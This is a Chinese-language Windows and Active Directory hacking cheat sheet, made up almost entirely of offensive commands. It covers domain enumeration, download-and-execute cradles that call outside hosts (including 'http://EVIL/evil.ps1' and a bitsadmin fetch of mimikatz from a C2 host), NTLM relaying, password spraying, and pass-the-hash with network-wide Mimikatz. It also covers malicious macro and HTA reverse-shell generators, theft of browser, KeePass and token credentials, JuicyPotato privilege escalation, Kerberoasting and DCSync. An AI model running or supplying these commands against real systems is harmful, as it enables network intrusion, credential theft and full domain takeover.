Hacking Windows 备忘录


记录一下Windows系统的Notes/Tricks
在此之前不得不说一下海底捞的服务确实好!记得上周去吃海底捞,结账的时候支付宝没钱了,还是服务员帮忙报的警……
这些笔记主要基于其他文章,备忘录和WIKI等。我只是想在这里收录最好的笔记。 很多没必要翻译,大多数都是工具的集合,工具都给你了还不会用,就是自己的问题.
net users
net users /domain
net localgroup
net groups /domain
net groups /domain "Domain Admins"
Get-ADUser
Get-Domain
Get-DomainUser
Get-DomainGroup
Get-DomainGroupMember -identity "Domain Admins" -Domain m0chanAD.local -DomainController 10.10.14.10
Find-DomainShare
## 主机发现
netdiscover -r subnet/24
nbtscan -r [range]
for /L %i in (1,1,255) do @ping.exe -n 1 -w 50 <10.10.10>.%i | findstr TTL
## DNS反向查询
$ComputerIPAddress = "10.10.14.14"


Get-DomainUser -SPN
Get-ADComputer -filter {ServicePrincipalName -like <keyword>} -Properties OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack,
PasswordLastSet,LastLogonDate,ServicePrincipalName,TrustedForDelegation,TrustedtoAuthForDelegation
nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
#https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
LDAPUtility.cs
Usage: ldaputility.exe options domain [arguments]
ldaputility.exe DumpAllUsers m0chan
ldaputility.exe DumpUser m0chan mr.un1k0d3r
ldaputility.exe DumpUsersEmail m0chan
ldaputility.exe DumpAllComputers m0chan
ldaputility.exe DumpComputer m0chan DC01
ldaputility.exe DumpAllGroups m0chan
ldaputility.exe DumpGroup m0chan "Domain Admins"
ldaputility.exe DumpPasswordPolicy m0chan
Also WMIUtility.cs for WMI Calls & LDAPQuery.cs for Raw LDAP Queries.
See github linked above for full details.




nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
# 获得当前域名[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# 获得信任域信息
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
# 查看域信息
# 查看域信任信息
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
nltest [server:<fqdn_foreign_domain>] /domain_trusts /all_trusts /v
nltest /dsgetfti:<domain>
nltest /server:<ip_dc> /domain_trusts /all_trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
# 查看所有域控
nltest /dclist:offense.local
net group "domain controllers" /domain
# View DC for Current Session
nltest /dsgetdc:m0chanAD.local
# View Domain Trusts from CMD
nltest /domain_trusts
# View User Info from CMD
nltest /user:"m0chan"
#查看缓存的票据信息
klist
# Get All Logged on Sessions, Includes NTLM & Kerberos
klist sessions
# View Cached Krbtgt
klist tgt
# 老版本的whoami
set u
#列出所有的用户名
([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname
#列出管理员
([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname
#查找特定账户
([adsisearcher]"(&(objectClass=User)(samaccountname=<username>))").FindAll().Properties
#通过描述来查找用户信息
([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host $_.samaccountname : $_.description }
demo:




#https://github.com/jasonwbarnett/linux-adtool
tar zxvf adtools-1.x.tar.gz
cd adtools-1.x
./configure
make
make install
> adtool list ou=user,dc=example,dc=com
CN=allusers,OU=user,DC=example,DC=com
OU=finance,OU=user,DC=example,DC=com
OU=administration,OU=user,DC=example,DC=com
> adtool oucreate marketing ou=user,dc=example,dc=com
> adtool useradd jsmith ou=marketing,ou=user,dc=example,dc=com
> adtool setpass jsmith banana
> adtool unlock jsmith
> adtool groupadd allusers jsmith
> adtool attributereplace jsmith telephonenumber 123
> adtool attributereplace jsmith mail [email protected]
#https://github.com/tevora-threat/SharpView
Get-DomainFileServer
Get-DomainGPOUserLocalGroupMapping
Find-GPOLocation
Get-DomainGPOComputerLocalGroupMapping
Find-GPOComputerAdmin
Get-DomainObjectAcl
Get-ObjectAcl
Add-DomainObjectAcl
Add-ObjectAcl
Remove-DomainObjectAcl
Get-RegLoggedOn
Get-LoggedOnLocal
Get-NetRDPSession
Test-AdminAccess
Invoke-CheckLocalAdminAccess
Get-WMIProcess
Get-NetProcess
Get-WMIRegProxy
Get-Proxy
Get-WMIRegLastLoggedOn
Get-LastLoggedOn
Get-WMIRegCachedRDPConnection
Get-CachedRDPConnection
Get-WMIRegMountedDrive
Get-RegistryMountedDrive
Find-InterestingDomainAcl
Invoke-ACLScanner
Get-NetShare
Get-NetLoggedon
nmap -p 139,445 --script smb.nse,smb-enum-shares,smbls
enum4linux 1.3.3.7
smbmap -H 1.3.3.7
smbclient -L \\INSERTIPADDRESS
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john
nbtscan [SUBNET]
#Check for SMB Signing
nmap --script smb-security-mode.nse -p 445 10.10.14.14
snmpwalk -c public -v1 10.10.14.14
snmpcheck -t 10.10.14.14 -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 10.10.14.14 -oG snmp_results.txt
snmpenum -t 10.10.14.14
nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
dig axfr blah.com @ns1.m0chan.com
nslookup -> set type=any -> ls -d m0chan.com
dnsrecon -d m0chan -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
ldapsearch -H ldap://<ip>
ldapwhoami
rpcclient -U "10.10.14.14"
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser <user>
lsaquery
lookupnames Guest
lookupnames Administrator
rdesktop -u guest -p guest INSERTIPADDRESS -g 94%
# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
hydra
medusa
and so on
m0chan Machine
mkdir tftp
atftpd --deamon --port 69 tftp
cp *file* tftp
On victim machine:
tftp -i <[IP]> GET <[FILE]>
echo open <[IP]> 21 > ftp.txt
echo USER demo >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs <url> <out_file>
Use echoup function on pentest.ws to generate echo commands.
https://pentest.ws/features
#https://github.com/danielbohannon/Invoke-CradleCrafter Use this to craft obsufacted cradles
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
(New-Object System.Net.WebClient).DownloadFile("https://server/filename", "C:\Windows\Temp\filename")
#Powershell Download to Memory
IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')
#Powershell with Proxy
$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('https://server/script.ps1'));
$fileName = "Passwords.kdbx"
$fileContent = get-content $fileName
$fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent)
$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)
$fileContentEncoded | set-content ($fileName + ".b64")
pscp.exe C:\Users\Public\m0chan.txt [email protected]:/tmp/m0chan.txt
pscp.exe [email protected]:/home/user/m0chan.txt C:\Users\Public\m0chan.txt
cmd.exe /c "bitsadmin.exe /transfer downld_job /download /priority high http://c2.m0chan.com C:\Temp\mimikatz.exe & start C:\Temp\binary.exe"
rdesktop 10.10.10.10 -r disk:linux='/home/user/filetransferout'
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
#File Transfer
certutil.exe -urlcache -split -f https://m0chan:8888/filename outputfilename
certutil.exe -encode inputFileName encodedOutputFileName
certutil.exe -decode encodedInputFileName decodedOutputFileName
curl http://server/file -o file
curl http://server/file.bat | cmd
IEX(curl http://server/script.ps1);Invoke-xxx
python smbserver.py Share `pwd` -u m0chan -p m0chan --smb-2support
Exploit
git clone https://github.com/SpiderLabs/Responder.git python Responder.py -i local-ip -I eth0


responder -I eth0 wpad
# 在WPAD攻击不起作用时使用,它使用IPv6和DNS将凭据中继到目标。
# By default IPV6 should be enabled.
git clone https://github.com/fox-it/mitm6.git
cd /opt/tools/mitm6
pip install .
mitm6 -d m0chanAD.local
ntlmrelayx.py -wh webserverhostingwpad:80 -t smb://TARGETIP/ -i
-i 打开一个交互式shell
Shout out to hausec for this super nice tip.
创建.scf文件并放入SMB Share内并启动Responder :)
Filename = @m0chan.scf
[Shell]
Command=2
IconFile=\\10.10.14.2\Share\test.ico
[Taskbar]
Command=ToggleDesktop
NTLM/Net-NTLMV1&V2的区别
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://payloads.online/archivers/2018-11-30/1#chalengeresponse
PS: You CANNOT relay a hash back to itself.
PS: 必须禁用SMB签名才能会用,您可以使用nmap scan或crackmapexec检查
crackmapexec smb 10.10.14.0/24 --gene-relay-list targets.txt
这将告诉您子网中未启用SMB签名的主机列表。
python Responder.py -I <interface> -r -d -w
ntlmrelayx.py -tf targets.txt (By default this will dump the local SAM of the targets, not very useful?)
我们如何执行命令呢?
ntlmrelayx.py -tf targets.txt -c powershell.exe -Enc asdasdasdasd
ntlmrelayx.py -tf targets.txt -c powershell.exe /c download and execute beacon... = RIP
#https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
Combine privxchange.py and ntlmrelayx
ntlmrelayx.py -t ldap://DOMAINCONTROLLER.m0chanAD.local --escalate-user TARGETUSERTOESCALATE
python privexchange.py -ah FDQN.m0chanAD.local DOMAINCONTROLLER.m0chanAD.local -u TARGETUSERTOESCALATE -d m0chanAD.local
#https://github.com/dafthack/MailSniper.git
Invoke-PasswordSprayOWA -ExchHostname EXCH2012.m0chanAD.local -UserList .\users.txt -Password Winter2019
#https://github.com/sensepost/ruler
./ruler-linux64 -domain mc0hanAD.local --insecure brute --userpass userpass.txt -v
#https://github.com/quickbreach/ExchangeRelayX
An NTLM relay tool to the EWS endpoint for on-premise exchange servers. Provides an OWA for hackers.
./exchangeRelayx.py -t https://mail.quickbreach.com
#https://github.com/dafthack/MailSniper.git
Enumerate GlobalAddressList
Get-GlobalAddressList -ExchHostname EXCH2012.m0chanAD.local -Username [email protected] -Password Winter2019
Enumerate AD Usernames
Get-ADUsernameFromEWS -Emaillist .\users.txt
Enumerate Mailbox Folders
Get-MailboxFolders -Mailbox [email protected]
Enumerate Passwords & Credentials Stored in Emails
Invoke-SelfSearch -Mailbox [email protected]
Enumerate Passwords & Credentials (Any Users) Requires DA or Exchange Admin
Invoke-GlobalMailSearch -ImpersonationAccount helenHR -ExchHostname Exch2012
CrackMapExec is installed on Kali or get Windows Binary from Github.
Has 3 Execution Methods
crackmapexec smb <- Creating and Running a Service over SMB
crackmapexec wmi <- Executes command over WMI
crackmapexec at <- Schedules Task with Task Scheduler
Can execute plain commands with -X flag i/e
crcakmapexec smb 10.10.14.0/24 -x whoami
crcakmapexec smb 10.10.14.0/24 <- Host Discovery
crackmapexec smb 10.10.14.0/24 -u user -p 'Password'
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --pass-pol
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --shares
Can also PTH with CME
crackmapexec smb 10.10.14.0/24 -u user -H e8bcd502fbbdcd9379305dca15f4854e
cme smb 10.8.14.14 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e --local-auth --shares
--local-auth is for Authenticating with Local Admin, good if Organisaton uses same local admin hash through network and not using LAPS
Dump Local SAM hashes
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth --sam
Running Mimikatz
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
^ Very noisy but yes you can run mimikatz across a WHOLE network range. RIP Domain Admin
Enum AV Products
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M enum_avproducts
Invoke-PasswordSprayOWA -ExchHostname m0chanAD.local -userlist harvestedUsers.txt -password Summer2019
[*] Now spraying the OWA portal at https://m0chanAD.local/owa/
[*] SUCCESS! User:m0chan:Summer2019
#https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
#https://github.com/NetSPI/PowerUpSQL
#View SQL Instances
Get-SQLInstanceDomain [| Get-SQLServerInfo]
#Login in with Domain Account
Get-SQLConnectionTestThreaded
#Login in with Default Password
Get-SQLServerDefaultLoginPw
#List DB, Tables & Columns
Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>
#Search Column Names for Word
Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10
#Try to Execute Commands (RCE)
Invoke-SQLOSCmd
#Enable XP_CMDShell Process
EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell '<cmd>'
go
#https://github.com/infosecn1nja/MaliciousMacroMSBuild
#https://lolbas-project.github.io/lolbas/Binaries/Msbuild/ - MSBuild Explained
Creation of a Shellcode MSBuild VBA Macro
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba
Creation of a PowerShell MSBuild VBA Macro
python m3-gen.py -p powershell -i /path/payload.ps1 -o output.vba
Creation of a Custom MSBuild VBA Macro
python m3-gen.py -p custom -i /path/msbuild.xml -o output.vba
Creation of a Shellcode MSBuild VBA Macro With Kill Date
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -k 20/03/2018
Creation of a Shellcode MSBuild VBA Macro With Environmental Keying
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain
python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain, microsoft, github
#https://github.com/felamos/weirdhta
python3 --help
python3 weirdhta.py 10.10.10.10 4444 --normal (for normal powershell reverse_shell)
python3 weirdhta.py 10.10.10.10 4444 --smb (without powershell payload, it will use smb)
python3 weirdhta.py 10.10.10.10 4444 --powercat (for powercat)
python3 weirdhta.py 10.10.10.10 4444 --command 'c:\windows\system32\cmd.exe' (custom command)
Ultimate Shell for WinRM Connections
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ]
-S, --ssl Enable SSL
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required)
-p, --password PASS Password
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-h, --help Display this help message
#https://github.com/gpoguy/GetVulnerableGPO
PowerShell script to find 'vulnerable' security-related GPOs that should be hardened (for more background, see the GPO discoverability section of this blog: https://sdmsoftware.com/group-policy-blog/security-related/security-fun-bloodhound-ms16-072-gpo-discoverability/) Requires GPMC & SDM Software GPMC PowerShell Module (used to more easily parse GP settings during the search): https://s3.amazonaws.com/sdmsoftware.com/dl/SDM-GPMC-Module2.0Setup.zip
#https://github.com/peewpw/Invoke-PSImage
Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
Invoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg
[Oneliner to execute from a file]
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest
[Oneliner to execute from the web]
过不了火绒.
#https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html
A module for executing arbitrary shellcode within Meterpreter aka executing Mimikatz in-memory, reflectively and interactively!
donut -f /tmp/mimikatz.exe -a 2 -o /tmp/payload.bin
use post/windows/manage/shellcode_inject
set SHELLCODE /tmp/payload.bin
set SESSION 1
run
systeminfo
wmic qfe
net users
hostname
whoami
net localgroups
echo %logonserver%
netsh firewall show state
netsh firewall show config
netstat -an
type C:\Windows\system32\drivers\etc\hosts
powershell.exe /c IEX(New-Object Net.WebClient).downloadString('webserver/PowerUp.ps1') ;Invoke-AllChecks
#https://github.com/GhostPack/SharpUp
C Sharp Implementation of PowerUp.ps1 which can be reflectively loaded.
If It’s AD Get Bloodhound Imported…
SharpHound.exe -> https://github.com/BloodHoundAD/SharpHound
IEX(System.Net.WebClient.DownloadString('http://webserver:4444/SharpHound.ps1'))
Invoke-CollectionMethod All
Import .zip to Bloodhound
If you can't exfil the .zip... Find a way ;) I joke, I joke. Output as plain json and copy over manually. It's a big big pain but it works.
git clone https://github.com/fox-it/BloodHound.py.git
cd BloodHound.py/ && pip install .
bloodhound-python -d m0chanAD.local -u m0chan -p Summer2019 -gc DOMAINCONTROLLER.m0chanAD.local -c all
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Full Permissions for 'Everyone' on Program Folders
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Modify Permissions for Everyone on Program Folders
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
schtasks /query /fo LIST /v
type C:\Users\m0chan\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
net use
wmic logicaldisk get caption,description
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
whoami /priv
Look for SeImpersonate, SeDebugPrivilege etc
qwinsta
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
smbclient //DOMAINCONTROLLER.local/SYSVOL -U m0chan
\m0chanAD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\Preferences\Groups\
http://www.sec-1.com/blog/wp-content/uploads/2015/05/gp3finder_v4.0.zip - For Decryption
Can also use PowerUP.ps1
#git clone https://github.com/rasta-mouse/CookieMonster
CookieMonster creds
CookieMonster.exe cookies -d [domain] -e
CookieMonster -a
Must be run in the context of the target users as chrome passwords are encrypted with DPAPI.
Can also use Mimikatz for this.
mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data"
mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect
mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect
#https://github.com/HarmJ0y/KeeThief
#http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
Get-Process keepass
tasklist | findstr keepass
Attacking KeePass
#https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose
KeeTheft.exe, Microsoft.Diagnostics.Runtime.dll & KeePatched.exe can also be used.
https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltration/Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"
Can also use incognito from meterpreter to steal access/delegation tokens and impersonate users. (Requires Admin/SYSTEM Privs)
#Tokenvator https://github.com/0xbadjuju/Tokenvator
Reflectively Load it with Powershell, Cobalt, SilentTrinity etc...
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
Reflectively Load .NET Assembly within Powershell if you cant do it through your C2 Infra
#Requires SeImpersonatePrivilege (Typically found on service accounts IIS Service, SQL Service etc)
#Reference https://ohpe.it/juicy-potato/
Requirements: SeAssignPrimaryTokenPrivilege and/or SeImpersonatePrivilege
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/JuicyPotato.exe','C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Backup\JuicyPotato.exe')
JuicyPotato.exe -l 1337 -p C:\Users\Public\Documents\Mochan.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Mochan.exe = Payload
5B3E6773-3A99-4A3D-8096-7765DD11785C = Target CLISD
A CLSID is a GUID that identifies a COM class object
Can also use -A flag to specify arguments alongside cmd.exe/powershell.exe etc
JUICY POTATO HAS TO BE RAN FROM CMD SHELL AND NOT POWERSHELL
#Check my Blog Post Kerberos Attacks in Depth for Further Information
#https://m0chan.github.io/Kerberos-Attacks-In-Depth
Get-DomainSPNTicket -Credential $cred -OutputFormat hashcat
because Hashcat over John anyday right?
Invoke-Kerberoast.ps1
python GetUserSPNs.py -request -dc-ip 10.10.14.15 m0chanad.local/serviceaccount
Ofc the above requires access to Port 88 on the DC but you can always port forward if executing GetUserSPNs.py manually.
https://github.com/GhostPack/SharpRoast --NOW Deprecated-- and incorproated into Rebeus with the kerberoast action
#https://github.com/skelsec/kerberoast
IMPORTANT: the accepted formats are the following
<ldap_connection_string> : <domainname>/<username>/<secret_type>:<secret>@<DC_ip>
<kerberos_connection_string>: <kerberos realm>/<username>/<secret_type>:<secret>@<DC_ip>
Look for vulnerable users via LDAP
kerberoast ldap all <ldap_connection_string> -o ldapenum
Use ASREP roast against users in the ldapenum_asrep_users.txt file
kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
Use SPN roast against users in the ldapenum_spn_users.txt file
kerberoast spnroast <kerberos_connection_string> -t ldapenum_spn_users.txt
#Accounts have to have DONT_REQ_PREAUTH explicitly set for them to be vulnerable
Get-ASRepHash -Domain m0chanAD.local -User victim
Can also use Rebeus (Reflectively Load .NET Assembly.)
.\Rubeus.exe asreproast
#运行DCSync需要特殊权限。 管理员,域管理员或企业管理员以及域控制器计算机帐户的任何成员都可以运行DCSync来提取密码数据。 请注意,默认情况下,只读域控制器不允许用户提取密码数据。
#and anyone with the Replicating Changes permissions set to Allow (i.e., Replicating Changes All/Replicating Directory Changes)
mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator